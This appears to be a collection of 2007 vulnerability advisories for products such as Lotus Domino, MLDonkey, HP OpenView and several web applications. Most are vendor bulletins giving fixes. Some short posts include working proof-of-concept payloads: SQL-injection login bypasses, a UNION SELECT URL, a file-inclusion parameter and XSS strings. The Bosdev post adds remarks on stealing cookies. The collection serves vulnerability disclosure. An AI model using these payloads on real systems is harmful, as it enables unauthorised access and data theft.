[ GLSA 200710-25 ] MLDonkey: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200710-25 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: MLDonkey: Privilege escalation Date: October 24, 2007 Bugs: #189412 ID: 200710-25 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The Gentoo MLDonkey ebuild adds a user to the system with a valid login shell and no password. Background == MLDonkey is a peer-to-peer filesharing client that connects to several different peer-to-peer networks, including Overnet and BitTorrent. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-p2p/mldonkey < 2.9.0-r3 >= 2.9.0-r3 Description === The Gentoo MLDonkey ebuild adds a user to the system named "p2p" so that the MLDonkey service can run under a user with low privileges. This user is created with a valid login shell and no password. Impact == A remote attacker could log into a vulnerable system as the p2p user. This would require an installed login service that permitted empty passwords, such as SSH configured with the "PermitEmptyPasswords yes" option, a local login console, or a telnet server. Workaround == See Resolution. Resolution == Change the p2p user's shell to disallow login. For example, as root run the following command: # usermod -s /bin/false p2p NOTE: updating to the current MLDonkey ebuild will not remove this vulnerability, it must be fixed manually. The updated ebuild is to prevent this problem from occurring in the future. Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200710-25.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp6PWDWuud38.pgp Description: PGP signature
iDefense Security Advisory 10.23.07: IBM Lotus Notes Client TagAttributeListCopy Buffer Overflow Vulnerability
IBM Lotus Notes Client TagAttributeListCopy Buffer Overflow Vulnerability iDefense Security Advisory 10.23.07 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 23, 2007 I. BACKGROUND IBM Corp.'s Lotus Notes software is an integrated desktop client option for accessing e-mail, calendars and applications on an IBM Corp. Lotus Domino server. More information can be found by visiting the URL below. http://www-142.ibm.com/software/sw-lotus/products/product4.nsf/wdocs/noteshomepage II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in IBM Corp.'s Lotus Notes mail user agent could allow attackers to execute arbitrary code in the context of the current user. When a Lotus Notes user receives an HTML email, the HTML is converted to a format resembling RTF (Rich Text Format). When messages are replied to, forwarded or copied to the clipboard, the e-mail format is converted again. The buffer overflow is the result of a call to "Cstrcpy" when copying an attacker supplied variable length string into a fixed-sized stack buffer. The overflow occurs at the "Cstrcpy" call inside the "TagAttributeListCopy" function in nnotes.dll. III. ANALYSIS Exploitation allows attackers to execute arbitrary code in the context of the recipient of the message. In order to be successful, an attacker must social engineer the victim into processing a specially crafted message in a certain way. Specifically, the victim must either forward, reply with history, or copy the message to the clipboard in order to trigger the vulnerability. Additionally, non-printable ASCII characters are converted to the LMBCS (Lotus MultiByte Character Set) before the overflow occurs. This complicates, but does not prevent, exploitation. IV. DETECTION iDefense confirmed the existence of this vulnerability in version 7.0.2 of IBM Corp.'s Lotus Notes. Additionally, versions 6.5.1, 6.5.3 and 7.0.1 were reported to be vulnerable. Other versions are suspected to be vulnerable. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE IBM Lotus has addressed this vulnerability within versions 7.0.3 and 8.0 of Lotus Notes. For more information, visit the following URL. http://www-1.ibm.com/support/docview.wss?rs=477&uid=swg21272930 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4222 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/07/2007 Initial vendor notification 02/07/2007 Initial vendor response 10/23/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by UVInc. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 10.23.07: IBM Lotus Domino IMAP Buffer Overflow Vulnerability
IBM Lotus Domino IMAP Buffer Overflow Vulnerability iDefense Security Advisory 10.23.07 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 23, 2007 I. BACKGROUND IBM Lotus Domino Server software provides messaging, calendaring and scheduling capabilities on a variety of operating systems. More information about the product is available at the following URL. http://www-142.ibm.com/software/sw-lotus/domino II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability within IBM Corp.'s Lotus Domino allows attackers to execute arbitrary code in the context of the IMAP service. This vulnerability exists within the IMAP component of a Domino Server. The problem specifically lies in the handling of mailbox names within specific commands. If a user has subscribed to a mailbox with an overly long name, certain commands will copy the user-supplied mailbox name into a fixed-size stack buffer without proper validation. III. ANALYSIS Exploitation allows attackers to execute arbitrary code in the context of the IMAP service. In order to conduct the attack, the attacker must be able to establish a TCP session with the IMAP service on TCP port 143. Valid credentials are required to access the vulnerable code. Under Windows, the privileges gained are (by default) that of the SYSTEM user. This allows an attacker to take complete control of the compromised system. Although the UNIX version of the service does not run as root, it does run as the same user as many other components of the Lotus Domino Server. Because of this an attacker may gain access to sensitive information or be able to maliciously subvert the system in other ways. IV. DETECTION iDefense has confirmed the existence of this vulnerability within version 7.0.2.2 of Lotus Domino running on Linux as well as Windows Server 2003. Previous versions, as well as builds for other platforms, are suspected to be vulnerable. V. WORKAROUND Employing firewalls to limit access to the affected service will mitigate exposure to this vulnerability. VI. VENDOR RESPONSE IBM Lotus has addressed this vulnerability within versions 6.5.6 Fix Pack 2 (FP2), 7.0.3 and 8.0 of Lotus Domino. For more information, visit the following URL. http://www-1.ibm.com/support/docview.wss?rs=477&uid=swg21270623 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3510 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/27/2007 Initial vendor notification 06/28/2007 Initial vendor response 10/23/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Manuel Santamarina Suarez. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
OSI CODES - PHP Live! Remote File Inclusion
Aria-Security Team http://Aria-Security.Net Persian Security Network Source Code: Affected file: Index.php Poc: /index.php?DOCUMENT_ROOT=file.txt ? Credits: Aria-Security The-0utl4w
Novell OpenSUSE SWAMP multiple XSS
Vendor Site: http://en.opensuse.org/Swamp Version affected: ??? Demo:http://swampdemo.suse.de/webswamp/swamp/template/Index.vm Class: Input Validation Error Overview:OpenSUSE Workflow Administration and Management Platform login page fails to sufficiently sanitize user-supplied input data via login box. Example: 1.alert('xss') 2.XSS 3.http://site.com/xss.swf";
Bosdev Multiple vulnerabilities
BosMarket Business Directory System http://www.bosdev.com BosMarket Multiple XSS vulnerabilities BosMarket is a craigslist like application that attempts to let users refer other small businesses. The problem is that when you post listings, its a a no holds barred kind of deal. Firstly, One can place XSS code into their user info. Just email the admin claiming your account details are screwy, and wham, easy access. The next vulnerability is within posts themselves. Once again, XSS code is not filtered. BosNews v4 XSS Then there is BosNews. The program allows for anonymous people to post news There us a form of BB code in use, but that doesnt stop the fact that script tags can be used as well. Its cookie based auth, so cookie theft is a snap, among other things people do with XSS. I emailed the guys at bosdev and am awaiting a response. Have fun. BosNews v4, v5 Install.php auth override. Using BosNews, we can install over the old installation without a username or password. It actually overwrites the old one. If you have the database info, it will even let you create a new admin username / password. I emailed the guys at bosdev and am awaiting a response. Have fun.
rPSA-2007-0222-1 cpio tar
rPath Security Advisory: 2007-0222-1 Published: 2007-10-23 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: [EMAIL PROTECTED]:1/2.6-14.1-1 [EMAIL PROTECTED]:1/1.15.1-7.3-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1861 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4476 Description: Previous versions of the cpio and tar packages are vulnerable to a Denial of Service attack in which an attacker can use a malformed archive file to cause a stack-based buffer overflow, crashing the application. It is not believed that this vulnerability can be exploited to execute malicious code. http://wiki.rpath.com/Advisories:rPSA-2007-0222 Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection
http://Aria-Security.Net - CodeWidgets.Com Online Event Registration Poc Normal User account: (login.asp) Email address: ' UNION SELECT * FROM users password: Aria-Security.Net Admin Panel: (admin_login.asp) Email address: ' UNION SELECT * FROM admin Password: Aria-Security.Net Credits Goes To Aria-Security Team Regards, The-0utl4w
[GS07-02] RSA Keon Multiple Cross-Site Scripting Vulnerabilities
GS07-02 RSA Keon Multiple Cross-Site Scripting Vulnerabilities Date & Version : 07/31/2007 - 1.0 Description : RSA KEON Registration Authority Web Interface has multiple Cross-Site Scripting Vulnerabilities. Request-spk.xuda and Add-msie-request.xuda components of RSA KEON are vulnerable to Cross-Site Scripting attacks. An attacker could use these vulnerabilities for manipulating the registration information, phising and other client side attacks. Risk Level : Medium Impact : Gain Access Systems Affected : RSA KEON Registration Authority Software Remedy : Contact RSA and visit https://knowledge.rsasecurity.com for remediation. Credits : Fatih Ozavci (GamaTEAM Member) Caglar Cakici (GamaTEAM Member) It's detected using GamaSEC Exploit Framework GamaSEC.net Security Solutions (www.gamasec.net) Original Advisory Link : http://www.gamasec.net/english/gs07-02.html References : 1. CERT - Vulnerability Note VU#342793
Aleris Software Systems Web Publisher Calendar SQL injection
http://www.alerisdata.com/articles/home.asp There exists an SQL injection vulnerability within the calendar section of a Aleris Software Systems web publisher. It seems thats Aleris uses this same calendar with every site they make that utilizes the publisher. www.example.com/calendar/page.asp?mode=1%20union%20all%20select%201,2,3,4,5,6%20FROM%20users-- I reported this to aleris and am awaiting a response. No fix yet.
HPSBMA02279 SSRT071298 rev.1 - HP OpenView Configuration Management (CM) Infrastructure (Radia) and Client Configuration Manager (CCM) Running httpd.tkd, Remote Unauthorized Access to Data
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01205079 Version: 1 HPSBMA02279 SSRT071298 rev.1 - HP OpenView Configuration Management (CM) Infrastructure (Radia) and Client Configuration Manager (CCM) Running httpd.tkd, Remote Unauthorized Access to Data NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-10-23 Last Updated: 2007-10-23 Potential Security Impact: Remote unauthorized access to data Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential vulnerability has been identified with HP OpenView Configuration Management (CM) Infrastructure (Radia) and Client Configuration Manager (CCM) running httpd.tkd. The vulnerability could be exploited to allow remote unauthorized access to data. References: CVE-2007-5413 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Configuration Management (CM) Infrastructure (Radia) v4.0, v4.1, v4.2, v4.2i running httpd.tkd on Windows, HP-UX, AIX, Solaris, and Linux. HP OpenView Client Configuration Manager (CCM) v2.0 running httpd.tkd on Windows. BACKGROUND The Hewlett-Packard Company thanks an anonymous researcher working with TippingPoint (www.tippingpoint.com) and the Zero Day Initiative (www.zerodayinitiative.com) for reporting this to [EMAIL PROTECTED] Note: The httpd.tkd module is used by several OpenView Configuration Management (CM) and OpenView Client Configuration Management (CCM) Infrastructure components. These components include OS Manager, Policy Server, Portal, Patch Manager, Proxy Server, Distributed Configuration Server and Multicast Server. There may be more than one httpd.tkd module on a system. Each must be replaced. Please refer to the patch documentation for further information. Note: The following is for use by the HP-UX Software Assistant. Only the HP-UX versions are listed AFFECTED VERSIONS For CM infrastructure (Radia) v4.0 HP-UX B.11.00 HP-UX B.11.11 HP-UX B.11.23 = action: install RADINFRAHPUX1_9 or subsequent URL: http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9 For CM infrastructure (Radia) v4.1 HP-UX B.11.00 HP-UX B.11.11 HP-UX B.11.23 = action: install RADINFRAHPUX1_00010 or subsequent URL: http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010 For CM infrastructure (Radia) v4.2 HP-UX B.11.00 HP-UX B.11.11 HP-UX B.11.23 = action: install RADINFRASOL_00011 or subsequent URL: http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRASOL_00011 End Affected Versions RESOLUTION HP has provided the following patches to resolve this vulnerability. The patches and installation instructions are available from the URL's listed below. Product Platform Patch ID URL CM Infrastructure v4.0 AIX RADINFRAAIX_8 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAAIX_8 CM Infrastructure v4.0 HP-UX B.11.00 RADINFRAHPUX1_9 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9 CM Infrastructure v4.0 HP-UX B.11.11 RADINFRAHPUX1_9or or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9 CM Infrastructure v4.0 HP-UX B.11.23 RADINFRAHPUX1_9 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_9 CM Infrastructure v4.0 Linux RADINFRALNX_7 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRALNX_7 CM Infrastructure v4.0 Solaris RADINFRASOL_9 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRASOL_9 CM Infrastructure v4.0 Win32 RADINFRAWIN32_00023 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAWIN32_00023 CM Infrastructure v4.0i Win32 RADINFRAWIN32_00024 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAWIN32_00024 CM Infrastructure v4.1 AIX RADINFRAAIX_9 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAAIX_9 CM Infrastructure v4.1 HP-UX B.11.00 RADINFRAHPUX1_00010 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010 CM Infrastructure v4.1 HP-UX B.11.11 RADINFRAHPUX1_00010 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010 CM Infrastructure v4.1 HP-UX B.11.23 RADINFRAHPUX1_00010 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRAHPUX1_00010 CM Infrastructure v4.1 Linux RADINFRALNX_8 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRALNX_8 CM Infrastructure v4.1 Solaris RADINFRASOL_00010 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADINFRASOL_00010 CM Infrastructure v4.1 Win32 RADINFRAWIN32_00025 or subsequent http://openview.hp.com/ecare/getsupportdoc?docid=RADI
Aria-Security.Net [Web based alpha tabbed address book SQL Injection]
http://Aria-Security.Net Web based alpha tabbed address book SQL Injection [codewidgets.com] Poc index.asp?alpha='[SQL INJECTION] Credits Goes To Aria-Security Team Regards, The-0utl4w